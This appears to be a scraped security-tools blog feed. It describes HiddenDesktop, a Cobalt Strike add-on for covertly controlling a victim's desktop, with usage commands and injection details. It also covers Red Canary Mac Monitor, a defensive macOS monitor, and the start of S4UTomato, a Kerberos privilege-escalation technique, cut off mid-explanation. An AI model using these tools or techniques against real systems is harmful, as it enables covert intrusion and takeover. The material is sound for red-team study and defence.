/><br /></code></pre></div> <h1 dir="auto" tabindex="-1">References</h1> <ul dir="auto"> <li><a href="https://github.com/juliourena/SharpNoPSExec" rel="nofollow" target="_blank" title="https://github.com/juliourena/SharpNoPSExec">https://github.com/juliourena/SharpNoPSExec</a></li> <li><a href="https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1" rel="nofollow" target="_blank" title="https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1">https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1</a></li> <li><a href="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf" rel="nofollow" target="_blank" title="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf">https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf</a></li> <li><a href="https://github.com/jborean93/pypsexec/tree/master" rel="nofollow" target="_blank" title="https://github.com/jborean93/pypsexec/tree/master">https://github.com/jborean93/pypsexec/tree/master</a></li> <li><a href="https://www.x86matthew.com/view_post?id=create_svc_rpc" rel="nofollow" target="_blank" title="https://www.x86matthew.com/view_post?id=create_svc_rpc">https://www.x86matthew.com/view_post?id=create_svc_rpc</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/frkngksl/NimExec" rel="nofollow" target="_blank" title="Download NimExec">Download NimExec</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-41891529238103955432023-11-29T08:30:00.002-03:002023-11-29T08:30:00.137-03:00HiddenDesktop - HVNC For Cobalt Strike<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHFGlHzYZvIAn9m0AXdjHfHhC3RvkGIpHRw4JrhMKicOnuYHHFwQms0GcJi4-jUNy4IZccs_2gyhApt0QETeVenvtqYayjBazLplWPPZa9jcHz9MNgRO9RvlX9kHXkz0MbmcdF450jFhR0CKVRRuX443XBKUnVOQC_Jzih_9AlIe5o8Om6l5LnMwYVxtiA/s1792/HiddenDesktop.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHFGlHzYZvIAn9m0AXdjHfHhC3RvkGIpHRw4JrhMKicOnuYHHFwQms0GcJi4-jUNy4IZccs_2gyhApt0QETeVenvtqYayjBazLplWPPZa9jcHz9MNgRO9RvlX9kHXkz0MbmcdF450jFhR0CKVRRuX443XBKUnVOQC_Jzih_9AlIe5o8Om6l5LnMwYVxtiA/w640-h366/HiddenDesktop.png" width="640" /></a></div><p><br /></p> <p dir="auto">Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="remote desktop">remote desktop</a> session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This <a href="https://www.kitploit.com/search/label/Cobalt%20Strike" target="_blank" title="Cobalt Strike">Cobalt Strike</a> BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.</p> <p dir="auto">There are four components of Hidden Desktop:</p> <ol dir="auto"> <li> <p dir="auto">BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.</p> </li> <li> <p dir="auto">HVNC shellcode: PIC implementation of TinyNuke HVNC.</p> </li> <li> <p dir="auto">Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.</p> </li> <li> <p dir="auto">Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.</p> </li> </ol><span><a name='more'></a></span><div><br /></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">Download the <a href="https://github.com/WKL-Sec/HiddenDesktop/releases" rel="nofollow" target="_blank" title="latest release">latest release</a> or compile yourself using <code>make</code>. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:</p> <div><pre><code>HiddenDesktop <server> <port><br /></code></pre></div> <p dir="auto">You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:</p> <div><pre><code>hd-launch-edge<br />hd-launch-explorer<br />hd-launch-run<br />hd-launch-cmd<br />hd-launch-chrome<br /></code></pre></div> <p dir="auto">You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:</p> <div><pre><code>hd-launch <command> [args]<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Demo</h2> <details class="details-reset border rounded-2" open=""> <summary class="px-3 py-2"> <svg aria-hidden="true" class="octicon octicon-device-camera-video" data-view-component="true" height="16" version="1.1" viewbox="0 0 16 16" width="16"> <path d="M16 3.75v8.5a.75.75 0 0 1-1.136.643L11 10.575v.675A1.75 1.75 0 0 1 9.25 13h-7.5A1.75 1.75 0 0 1 0 11.25v-6.5C0 3.784.784 3 1.75 3h7.5c.966 0 1.75.784 1.75 1.75v.675l3.864-2.318A.75.75 0 0 1 16 3.75Zm-6.5 1a.25.25 0 0 0-.25-.25h-7.5a.25.25 0 0 0-.25.25v6.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-6.5ZM11 8.825l3.5 2.1v-5.85l-3.5 2.1Z"></path> </svg> <span>Hidden.Desktop.mp4</span> <span></span> </summary> <video class="d-block rounded-bottom-2 border-top width-fit" controls="controls" data-canonical-src="https://user-images.githubusercontent.com/9327972/241064072-82f73393-ba44-42b4-8eae-b36b7181fac0.mp4" muted="muted" src="https://user-images.githubusercontent.com/9327972/241064072-82f73393-ba44-42b4-8eae-b36b7181fac0.mp4" style="max-height: 640px; min-height: 200px;"> </video> </details> <h2 dir="auto" tabindex="-1">Implementation Details</h2> <ol dir="auto"> <li>The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using <code>rportfwd</code>. Status updates are sent back to Beacon through a named pipe.</li> <li>The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the <code>InputHandler</code> function in the HVNC shellcode. It uses <code>BeaconInjectProcess</code> to execute the shellcode, meaning the behavior can be customized in a <a href="https://www.kitploit.com/search/label/Malleable%20C2" target="_blank" title="Malleable C2">Malleable C2</a> profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.</li> <li><code>InputHandler</code> creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (<code>OpenDesktopA</code>) or created (<code>CreateDesktopA</code>). A new socket is established through a reverse <a href="https://www.kitploit.com/search/label/Port%20Forward" target="_blank" title="port forward">port forward</a> (<code>rportfwd</code>) to the HVNC server. The input handler creates a new thread for the <code>DesktopHandler</code> function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.</li> <li><code>DesktopHandler</code> establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.</li> </ol> <h2 dir="auto" tabindex="-1">Compatibility</h2> <p dir="auto">The HiddenDesktop BOF was tested using <a href="https://github.com/WKL-Sec/HiddenDesktop/blob/main/example.profile" rel="nofollow" target="_blank" title="example.profile">example.profile</a> on the following Windows versions/architectures:</p> <ul dir="auto"> <li>Windows Server 2022 x64</li> <li>Windows Server 2016 x64</li> <li>Windows Server 2012 R2 x64</li> <li>Windows Server 2008 x86</li> <li>Windows 7 SP1 x64</li> </ul> <h2 dir="auto" tabindex="-1">Known Issues</h2> <ul dir="auto"> <li>The start menu is not functional.</li> </ul> <h2 dir="auto" tabindex="-1">Credits</h2> <ul dir="auto"> <li>Heavily based on <a href="https://github.com/rossja/TinyNuke" rel="nofollow" target="_blank" title="TinyNuke">TinyNuke</a></li> <li>Included improvements/fixes from <a href="https://github.com/Meltedd/HVNC" rel="nofollow" target="_blank" title="Meltedd/HVNC">Meltedd/HVNC</a></li> <li>Uses Beacon job interface and project structure from <a href="https://github.com/SolomonSklash/netntlm" rel="nofollow" target="_blank" title="SecIdiot/netntlm">SecIdiot/netntlm</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/WKL-Sec/HiddenDesktop" rel="nofollow" target="_blank" title="Download HiddenDesktop">Download HiddenDesktop</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16986766610706040692023-11-09T08:30:00.018-03:002023-11-09T08:30:00.165-03:00Red Canary Mac Monitor - An Advanced, Stand-Alone System Monitoring Tool Tailor-Made For macOS Security Research<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwYvf3QRe0-LaXdRdYYfezwTNMH5t_ZbQJwFOYcVyYIIyr_GU9-MKgqFtN46qOW0JO6-iUeP0XFaSx8TNTqdbNiYG5Sc6pP9MXaQuPpFL81fEv4qeAc8IDc5envHd93cBKa4J6Wq6vBaGGXSNJcUTPQZzES7uxjXew8oGZ1ReveTAKbLa8VTq4qGCN0AXc/s6104/mac-monitor_1_FeatureSummary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3416" data-original-width="6104" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwYvf3QRe0-LaXdRdYYfezwTNMH5t_ZbQJwFOYcVyYIIyr_GU9-MKgqFtN46qOW0JO6-iUeP0XFaSx8TNTqdbNiYG5Sc6pP9MXaQuPpFL81fEv4qeAc8IDc5envHd93cBKa4J6Wq6vBaGGXSNJcUTPQZzES7uxjXew8oGZ1ReveTAKbLa8VTq4qGCN0AXc/w640-h358/mac-monitor_1_FeatureSummary.png" width="640" /></a></div><div><br /></div> <p dir="auto">Red Canary Mac Monitor is an <strong>advanced, stand-alone system monitoring tool tailor-made for macOS security research, malware triage, and system troubleshooting</strong>. Harnessing Apple Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to surface only the events that are relevant to you. The telemetry collected includes process, interprocess, and file events in addition to rich metadata, allowing users to contextualize events and tell a story with ease. With an intuitive interface and a rich set of analysis features, Red Canary Mac Monitor was designed for a wide range of skill levels and backgrounds to detect macOS threats that would otherwise go unnoticed. As part of Red Canary’s commitment to the research community, the Mac Monitor distribution package is available to download for free.</p> <h2 dir="auto" tabindex="-1">Requirements</h2> <ul dir="auto"> <li>Processor: We recommend an <code>Apple Silicon</code> machine, but <code>Intel</code> works too!</li> <li>System memory: <code>4GB+</code> is recommended</li> <li>macOS version: <code>13.1+</code> (Ventura)</li> </ul> <h2 dir="auto" tabindex="-1">How can I install this thing?</h2> <blockquote> <p dir="auto"><strong>Homebrew?</strong> <code>brew install --cask red-canary-mac-monitor</code></p> </blockquote> <ul dir="auto"> <li>Go to the releases section and download the latest installer: <a href="https://github.com/redcanaryco/mac-monitor/releases" rel="nofollow" target="_blank" title="https://github.com/redcanaryco/mac-monitor/releases">https://github.com/redcanaryco/mac-monitor/releases</a></li> <li>Open the app: <code>Red Canary Mac Monitor.app</code></li> <li>You'll be prompted to "Open System Settings" to "Allow" the System Extension.</li> <li>Next, System Settings will automatically open to <code>Full Disk Access</code> -- you'll need to flip the switch to enable this for the <code>Red Canary Security Extension</code>. Full Disk Access is a <a href="https://developer.apple.com/documentation/endpointsecurity/3259700-es_new_client#:~:text=The%20user%20does%20this%20in%20the%20Security%20and%20Privacy%20pane%20of%20System%20Preferences%2C%20by%20adding%20the%20app%20to%20Full%20Disk%20Access." rel="nofollow" target="_blank" title="Red Canary Mac Monitor is an advanced, stand-alone system monitoring tool tailor-made for macOS security research. Beginning with Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to reduce noise. (3)"><em>requirement</em> of Endpoint Security</a>.</li> <li>️ Click the "Start" button in the app and you'll be prompted to reopen the app. Done!</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutZE3n5ud3qjGixQYapOjypXrQY8AvNdUONP2MPPUoW4N_7ruLrGtv4A07DriEu691hUvHnVWAemJbPN8vTVckzy8g763hxHrkUG5tRoCFMEV_aOFMavQw5eNp5htdvyYSeHBmnN2f6MJEuJl6IP4hWLV7g695AGOt6MD4xiVHqToNSzUdpq6GqSrgjvo/s3434/mac-monitor_2_Install.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1928" data-original-width="3434" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgutZE3n5ud3qjGixQYapOjypXrQY8AvNdUONP2MPPUoW4N_7ruLrGtv4A07DriEu691hUvHnVWAemJbPN8vTVckzy8g763hxHrkUG5tRoCFMEV_aOFMavQw5eNp5htdvyYSeHBmnN2f6MJEuJl6IP4hWLV7g695AGOt6MD4xiVHqToNSzUdpq6GqSrgjvo/w640-h360/mac-monitor_2_Install.png" width="640" /></a></div><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Install footprint</h3> <ul dir="auto"> <li>Event monitor app which establishes an XPC connection to the Security Extension: <code>/Applications/Red Canary Mac Monitor.app</code> w/signing <a href="https://www.kitploit.com/search/label/Identifier" target="_blank" title="identifier">identifier</a> of <code>com.redcanary.agent</code>.</li> <li>Security Extension: <code>/Library/SystemExtensions/../com.redcanary.agent.securityextension.systemextension</code> w/signing identifier of <code>com.redcanary.agent.securityextension.systemextension</code>.</li> </ul> <h2 dir="auto" tabindex="-1">Uninstall</h2> <blockquote> <p dir="auto"><strong>Homebrew?</strong> <code>brew uninstall red-canary-mac-monitor</code>. When using this option you will likely be prompted to authenticate to remove the System Extension.</p> </blockquote> <ul dir="auto"> <li><strong>From the Finder</strong> delete the app and authenticate to remove the System Extension. You can't do this from the Dock. It's that easy!</li> <li>You can also <em>just</em> remove the Security Extension if you want in the app's menu bar or by going into the app settings.</li> <li>(<code>1.0.3</code>) Supports removal using the <code>../Contents/SharedSupport/uninstall.sh</code> script.</li> </ul> <h2 dir="auto" tabindex="-1">How are updates handled?</h2> <blockquote> <p dir="auto"><strong>Homebrew?</strong> <code>brew update && brew upgrade red-canary-mac-monitor</code>. When using this option you will likely be prompted to authenticate to remove the System Extension.</p> </blockquote> <ul dir="auto"> <li>When a new version is available for you to download we'll make a new <a href="https://github.com/redcanaryco/mac-monitor/releases/" rel="nofollow" target="_blank" title="release">release</a>.</li> <li>We'll include updated notes and telemetry summaries (if applicable) for each release.</li> <li>All you, as the end user, will need to do is download the update and run the installer. We'll take care of the rest .</li> </ul> <h2 dir="auto" tabindex="-1">How to use this repository</h2> <p dir="auto">Here we'll be hosting:</p> <ul dir="auto"> <li>The distribution package for easy install. See the <a href="https://github.com/redcanaryco/mac-monitor/releases/" rel="nofollow" target="_blank" title="Red Canary Mac Monitor is an advanced, stand-alone system monitoring tool tailor-made for macOS security research. Beginning with Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to reduce noise. (7)"><code>Releases</code> section</a>. Each major build corresponds to a code name. The first of these builds is <code>GoldCardinal</code>.</li> <li>Telemetry reports in <code>Telemetry reports/</code> (i.e. all the artifacts that can be collected by the Security Extension).</li> <li>Iconography (what the symbols and colors mean) in <code>Iconography/</code></li> <li>Updated mute set summaries in <code>Mute sets/</code></li> <li><code>AtomicESClient</code> is a seperate, but very closely related project showing the ropes of Endpoint Security check it out in: <code>AtomicESClient/</code></li> </ul> <p dir="auto">Additionally, you can submit feature requests and bug reports here as well. When creating a new Issue you'll be able to use one of the two provided templates. Both of these options are also accessible from the in-app "Help" menu.</p> <ul dir="auto"> <li><a href="https://github.com/redcanaryco/mac-monitor/issues/new?assignees=Brandon7CC&labels=rc-mac-feature-request&template=feature_request.md&title=" rel="nofollow" target="_blank" title="Feature request">Feature request</a></li> <li><a href="https://github.com/redcanaryco/mac-monitor/issues/new?assignees=Brandon7CC&labels=rc-mac-bug&template=bug_report.md&title=" rel="nofollow" target="_blank" title="Bug report">Bug report</a></li> </ul> <h2 dir="auto" tabindex="-1">How are releases structured?</h2> <p dir="auto">Each release of Red Canary Mac Monitor has a corresponding build name and version number. The first release has the build name of: <code>GoldCardinal</code> and version number <code>1.0.1</code>.</p> <h2 dir="auto" tabindex="-1">What are some standout features?</h2> <ul dir="auto"> <li> <p dir="auto"><strong>High fidelity ES events modeled and enriched</strong> with some events containing further enrichment. For example, a process being File Quarantine-aware, a file being quarantined, code signing certificates, etc.</p> </li> <li> <p dir="auto"><strong>Dynamic runtime ES event subscriptions</strong>. You have the ability to on-the-fly modify your event subscriptions -- enabling you to cut down on noise while you're working through traces.</p> </li> <li> <p dir="auto"><strong>Path muting at the API level</strong> -- Apple's Endpoint Security team has put a lot of work recently into enabling advanced path muting / inversion capabilities. Here, we cover the majority of the API features: <code>es_mute_path</code> and <code>es_mute_path_events</code> along with the types of <code>ES_MUTE_PATH_TYPE_PREFIX</code>, <code>ES_MUTE_PATH_TYPE_LITERAL</code>, <code>ES_MUTE_PATH_TYPE_TARGET_PREFIX</code>, and <code>ES_MUTE_PATH_TYPE_TARGET_LITERAL</code>. Right now we do not support inversion. <strong>I'd love it if the ES team added inversion on a per-event basis instead of per-client</strong>.</p></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlfEPERQPw64zROwYdlnMaZ15Pt8R4_9PEU_QhU5yrxRiVGPNUQsqEiHREFGhHX_l7C6wOzuWQs-fmtJrUz_DkXCxZc-6fPPnqXvx3sUHUddgcaZ9lyWY4bv6QOpUriDIC5Uk2oNqiRyGU8FXoDUYkH13sEd4GFiXIpd8ffWiwQEBfBSj69J6epsHeBOew/s5422/mac-monitor_3_MuteSubscriptionsOverview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3092" data-original-width="5422" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlfEPERQPw64zROwYdlnMaZ15Pt8R4_9PEU_QhU5yrxRiVGPNUQsqEiHREFGhHX_l7C6wOzuWQs-fmtJrUz_DkXCxZc-6fPPnqXvx3sUHUddgcaZ9lyWY4bv6QOpUriDIC5Uk2oNqiRyGU8FXoDUYkH13sEd4GFiXIpd8ffWiwQEBfBSj69J6epsHeBOew/w640-h364/mac-monitor_3_MuteSubscriptionsOverview.png" width="640" /></a></div><ul dir="auto"> <li> <p dir="auto"><strong>Detailed event facts</strong>. <strong>Right click on any event</strong> in a table row to access event metadata, filtering, muting, and unsubscribe options. Core to the user experience is the ability to drill down into any given event or set of events. To enable this functionality we’ve developed “Event facts” windows which contain metadata / additional <a href="https://www.kitploit.com/search/label/Enrichment" target="_blank" title="enrichment">enrichment</a> about any given event. Each event has a curated set metadata that is displayed. For example, process execution events will generally contain code signing information, environment variables, correlated events, etc. Below you see examples of file creation and BTM launch item added event facts.</p></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrR7naL44hJJ8WW4i3pPvIDXnt3bZobQTgQeSYgTmohg86L8HELpAawDBmgjq9WeTaFriZIpELtObnglRFdiwoKnx0K07eTuMIowHfmew8DwILIEdmJl7UVeB9FACJXbo5LI9va00RvvVVxEL-6InEBoV2MbMiouNJ1p5Tiw53zg8wZYSqd8wgg7Bj6jyp/s5506/mac-monitor_4_EventFactsOverview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3082" data-original-width="5506" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrR7naL44hJJ8WW4i3pPvIDXnt3bZobQTgQeSYgTmohg86L8HELpAawDBmgjq9WeTaFriZIpELtObnglRFdiwoKnx0K07eTuMIowHfmew8DwILIEdmJl7UVeB9FACJXbo5LI9va00RvvVVxEL-6InEBoV2MbMiouNJ1p5Tiw53zg8wZYSqd8wgg7Bj6jyp/w640-h358/mac-monitor_4_EventFactsOverview.png" width="640" /></a></div><ul dir="auto"> <li> <p dir="auto"><strong>Event correlation</strong> is an <em>exceptionally</em> important component in any analyst's tool belt. The ability to see which events are "related" to one-another enables you to manipulate the telemetry in a way that makes sense (other than simply dumping to JSON or representing an individual event). We perform event correlation at the process level -- this means that for any given event (which have an initiating and/or target process) we can deeply link events that any given process instigated.</p> </li> <li> <p dir="auto"><strong>Process grouping</strong> is another helpful way to represent process telemetry around a given <code>ES_EVENT_TYPE_NOTIFY_EXEC</code> or <code>ES_EVENT_TYPE_NOTIFY_FORK</code> event. By grouping processes in this way you can easily identify the chain of activity.</p> </li> <li> <p dir="auto"><strong>Artifact filtering</strong> enabled users to remove (but not destroy) events from view based on: event type, initiating process path, or target process path. This standout feature enables analysts to cut through the noise quickly while still retaining all data.</p> <ul dir="auto"> <li>Lossy filtering (i.e. events that are dropped from the trace) is also available in the form of "dropping platform binaries" -- another useful technique to cut through the noise.</li> </ul> </li> </ul> <p dir="auto"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Mbv9sukAYkjHdA5Nz9qfWvKHzLzGZGYx5gBcFq1oo4wP6EyGI7yNJXdjcMShDUbAaQqgEZF4lfUZWjh8QFhUkMBHdpjhrKb835pTIJjDyrZbC3BzqrXRxhRDSM4Jkz8Xz1w0WMqMxM5PAtsL4Cbc7LdIRDVJwJZhyphenhyphencQKOunXVw9vH1L3xblFng6tQHSF/s2990/mac-monitor_5_ArtifactFilteringOverview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2990" data-original-width="2848" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Mbv9sukAYkjHdA5Nz9qfWvKHzLzGZGYx5gBcFq1oo4wP6EyGI7yNJXdjcMShDUbAaQqgEZF4lfUZWjh8QFhUkMBHdpjhrKb835pTIJjDyrZbC3BzqrXRxhRDSM4Jkz8Xz1w0WMqMxM5PAtsL4Cbc7LdIRDVJwJZhyphenhyphencQKOunXVw9vH1L3xblFng6tQHSF/s320/mac-monitor_5_ArtifactFilteringOverview.png" width="305" /></a></div><br /><p dir="auto"><br /></p><p dir="auto"><br /></p> <ul dir="auto"> <li><strong>Telemetry export</strong>. Right now we support pretty JSON and JSONL (one JSON object per-line) for the full or partial system trace (keyboard shortcuts too). You can access these options in the menu bar under "Export Telemetry".</li> <li><strong>Process subtree generation</strong>. When viewing the event facts window for any given event we’ll attempt to generate a process lineage subtree in the left hand sidebar. This tree is intractable – click on any process and you’ll be taken to its event facts. <strong>Similarly, you can right click on any process in the tree to pop out the facts for that event</strong>.</li> <li><strong>Dynamic event distribution chart</strong>. This is a fun one enabled by the SwiftUI team. The graph shows the distribution of events you're subscribed to, currently in-scope (i.e. not filtered), and have a count of more than nothing. This enables you to <em>very</em> quickly identify noisy events. The chart auto-shows/hides itself, but you can bring it back with the: "Mini-chart" button in the toolbar.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nk_iP-0GN8gZPcqzLXeC1o2DzAhfKb2Qwf1pHY-C_We1wS1XulDOsHO1aSKJY77MF3iF0l4CPsl3cXaTvcQaIkt51jf1Rlp1JvRIrfbm93zZT2RYMYKD6C1rfNIeSWg00YtcY00hNS5-gWhrTMvTYGPWUmvbaG5r4StgVH3DDJ1A6DcAPMTjcVeiQ2Rc/s2496/mac-monitor_6_DistributionChart.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="779" data-original-width="2496" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1nk_iP-0GN8gZPcqzLXeC1o2DzAhfKb2Qwf1pHY-C_We1wS1XulDOsHO1aSKJY77MF3iF0l4CPsl3cXaTvcQaIkt51jf1Rlp1JvRIrfbm93zZT2RYMYKD6C1rfNIeSWg00YtcY00hNS5-gWhrTMvTYGPWUmvbaG5r4StgVH3DDJ1A6DcAPMTjcVeiQ2Rc/w640-h200/mac-monitor_6_DistributionChart.png" width="640" /></a></div><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Some other features</h2> <ul dir="auto"> <li>Another very important feature of any <a href="https://www.kitploit.com/search/label/Dynamic%20Analysis" target="_blank" title="dynamic analysis">dynamic analysis</a> tool is to not let an event limiter or memory inefficient implementation get in the way of the user experience. To address this (the best we currently can) we’ve implemented an <a href="https://www.kitploit.com/search/label/Asynchronous" target="_blank" title="asynchronous">asynchronous</a> parent / child-like <strong>Core Data stack</strong> which stores our events as “entities” in-memory. This enables us to store virtually unlimited events with Mac Monitor. Although, the time of insertions does become more taxing as the event limit gets very large.</li> <li>Since Mac Monitor is based on a Security Extension which is always running in the background (like an EDR sensor) we baked in functionality such that it <strong>does not process events when a system trace is not occurring</strong>. This means that the Red Canary Security Extension (<code>com.redcanary.agent.securityextension</code>) will not needlessly utilize resources / battery power when a trace is not occurring.</li> <li>Distribution package: <strong>The install process is often overlooked</strong>. However, if users do not have a good understanding of what’s being installed or if it’s too complex to install the barrier to entry might be just high enough to dissuade people from using it. This is why we ship Mac Monitor as a notarized distribution package.</li> </ul> <h2 dir="auto" tabindex="-1">Can you open source Mac Monitor?</h2> <p dir="auto">We know how much you would love to learn from the source code and/or build tools or commercial products on top of this. Currently, however, Mac Monitor will be <a href="https://www.kitploit.com/search/label/Distributed" target="_blank" title="distributed">distributed</a> as a free, closed-source tool. Enjoy what's being offered and please continue to provide your great feedback. Additionally, never hesitate to reach out if there's one aspect of the implementation you'd love to learn more about. We're an open book when it comes to geeking out about all things implementation, usage, and research methodology.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redcanaryco/mac-monitor" rel="nofollow" target="_blank" title="Download Mac-Monitor">Download Mac-Monitor</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-88524826991262865722023-10-07T08:30:00.001-03:002023-10-07T08:30:00.138-03:00S4UTomato - Escalate Service Account To LocalSystem Via Kerberos<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG"><img alt="" border="0" height="402" id="BLOGGER_PHOTO_ID_7276663114647162034" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_w1RSjVvWIPM8gX7k6vlskrO4qoENFNWzsNAj5z5435D1ByisnhDyRzrTjc0UsRBtEve_VrA9KL7ILordzre2fUL8sAPUE2gH_VZ75jlTQEtU0Iw3m2LgF7p6VjFutZONF4PeQjl9LHXhdf0QSMzpb3aWspKunN2GFWAFb7wy8-iFHnBRS6u4nTe4xsdG=w640-h402" width="640" /></a></p><p><br /></p> <p dir="auto">Escalate Service Account To LocalSystem via Kerberos.</p> <h1 dir="auto" tabindex="-1">Traditional Potatoes</h1> <p dir="auto">Friends familiar with the "Potato" series of <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="_blank" title="privilege escalation">privilege escalation</a> should know that it can elevate service account privileges to local system privileges. The early exploitation techniques of "Potato" are almost identical: leveraging certain features of COM interfaces, deceiving the NT AUTHORITY\SYSTEM account to connect and authenticate to an attacker-controlled RPC server. Then, through a series of API calls, an intermediary (NTLM Relay) attack is executed during this <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> process, resulting in the generation of an <a href="https://www.kitploit.com/search/label/Access%20Token" target="_blank" title="access token">access token</a> for the NT AUTHORITY\SYSTEM account on the local system. Finally, this token is stolen, and the <code>CreatePr ocessWithToken()</code> or <code>CreateProcessAsUser()</code> function is used to pass the token and create a new process to obtain SYSTEM privileges.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">How About Kerberos</h1> <p dir="auto">In any scenario where a machine is joined to a domain, you can leverage the aforementioned techniques for local privilege escalation as long as you can run code under the context of a Windows service account or a Microsoft virtual account, provided that the <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> hasn't been hardened to fully defend against such attacks.</p> <p dir="auto">In a Windows domain environment, SYSTEM, NT AUTHORITY\NETWORK SERVICE, and Microsoft virtual accounts are used for authentication by system computer accounts that are joined to the domain. Understanding this is crucial because in modern versions of Windows, most Windows services run by default using Microsoft virtual accounts. Notably, IIS and MSSQL use these virtual accounts, and I believe other applications might also employ them. Therefore, we can abuse the S4U extension to obtain the service ticket for the domain administrator account "Administrator" on the local machine. Then, with the help of James Forshaw (<a href="https://twitter.com/tiraniddo" rel="nofollow" target="_blank" title="@tiraniddo">@tiraniddo</a>)'s <a href="https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82" rel="nofollow" target="_blank" title="Escalate Service Account To LocalSystem via Kerberos (6)"><em>SCMUACBypass</em></a>, we can use that ticket to create a system service and ga in SYSTEM privileges. This achieves the same effect as traditional methods used in the "Potato" family of privilege escalation techniques.</p> <p dir="auto">Before this, we need to obtain a TGT (Ticket Granting Ticket) for the local machine account. This is not easy because of the restrictions imposed by service account permissions, preventing us from obtaining the computer's Long-term Key and thus being unable to construct a KRB_AS_REQ 